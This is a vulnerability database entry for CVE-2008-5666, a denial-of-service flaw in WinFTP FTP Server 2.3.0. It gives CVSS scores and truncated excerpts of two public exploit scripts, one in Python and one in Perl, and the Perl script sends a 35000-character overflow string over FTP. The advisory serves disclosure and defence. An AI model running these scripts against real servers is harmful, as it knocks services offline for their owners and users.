3.5
CVSSv2

CVE-2008-5666

Published: 19/12/2008 Updated: 29/09/2017
CVSS v2 Base Score: 3.5 | Impact Score: 2.9 | Exploitability Score: 6.8
VMScore: 360
Vector: AV:N/AC:M/Au:S/C:N/I:N/A:P

Vulnerability Summary

WinFTP FTP Server 2.3.0, when passive (aka PASV) mode is used, allows remote authenticated users to cause a denial of service via a sequence of FTP sessions that include an invalid "NLST -1" command.

Vulnerable Product Search on Vulmon Subscribe to Product

wftpserver winftp ftp server 2.3.0

Exploits

# WinFTP v230 DoS exploit # WinFTP URL - wwwwftpservercom/ # DoS'ed when try to send data # (x)dmnt # -*- coding: windows-1252 -*- import socket import time import sys PORT = 21 def help_info(): print ("Usage: winftp <host> <login> <password>\n") print ("Note: anonymous is enought\n") def conn(hostname, user ...
#!/usr/bin/perl ############ # # Simple Dos Crap for the winftpsrvexe v230 # by Julien Bedard # #################################### use Net::FTP; $wftpsrvaddr = "255255255255"; $overflow = "?" x 35000; $user = "test"; $pass = "test"; $port = 21; $ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server ...